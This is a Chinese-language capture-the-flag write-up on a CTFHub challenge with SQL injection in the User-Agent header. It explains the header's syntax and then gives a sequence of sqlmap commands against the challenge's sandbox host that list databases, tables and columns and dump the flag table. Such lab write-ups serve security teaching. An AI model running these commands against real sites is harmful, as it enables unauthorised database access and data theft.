在 HTTP 协议中,User-Agent 首部包含了一个特征字符串,用来让网络协议的对端来识别发起请求的用户代理软件的应用类型、操作系统、软件开发商以及版本号。

它的语法如下:

  1. User-Agent: <product> / <product-version> <comment>

浏览器通常使用的格式为:

User-Agent: Mozilla/<version> (<system-information>) <platform> (<platform-details>) <extensions>

我们打开题目,发现注入点在 User-Agent:

1.png

我们尝试在 Brupsuite 的 Repeater 验证一下:

2.png

我们使用 SQLMap 完成自动化注入,使用--level=3(会测试 User-Agent 和 Referer 头注入)。

查询数据库信息

sqlmap -u "http://challenge-f233f1ce5c09a5ad.sandbox.ctfhub.com:10800/" --batch --threads 4 --level=3 --dbs

3.png

我们关注sqli数据库。

查询数据库中的表

sqlmap -u "http://challenge-f233f1ce5c09a5ad.sandbox.ctfhub.com:10800/" --batch --threads 4 --level=3 -D sqli --tables

4.png

我们关注yrzmghfgdu这张表。

查询表结构

sqlmap -u "http://challenge-f233f1ce5c09a5ad.sandbox.ctfhub.com:10800/" --batch --threads 4 --level=3 -D sqli -T yrzmghfgdu --columns

5.png

这张表有 1 个字段,名字为:wbcfkbwsek

查询表中的记录

sqlmap -u "http://challenge-f233f1ce5c09a5ad.sandbox.ctfhub.com:10800/" --batch --threads 4 --level=3 -D sqli -T yrzmghfgdu -C wbcfkbwsek --dump

6.png